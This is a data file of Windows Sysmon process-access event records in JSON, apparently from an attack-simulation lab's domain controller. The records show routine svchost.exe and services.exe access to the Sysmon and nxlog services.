{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1353,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.583\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.583","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1354,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.583\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.583","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1355,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.583\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.583","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1356,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.583\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.583","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1357,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.583\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.583","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1358,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.583\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nSourceProcessId: 852\r\nSourceThreadId: 948\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nTargetProcessId: 2116\r\nTargetImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.583","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","SourceProcessId":"852","SourceThreadId":"948","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","TargetProcessId":"2116","TargetImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1359,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.583\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.583","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1360,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.583\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.583","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
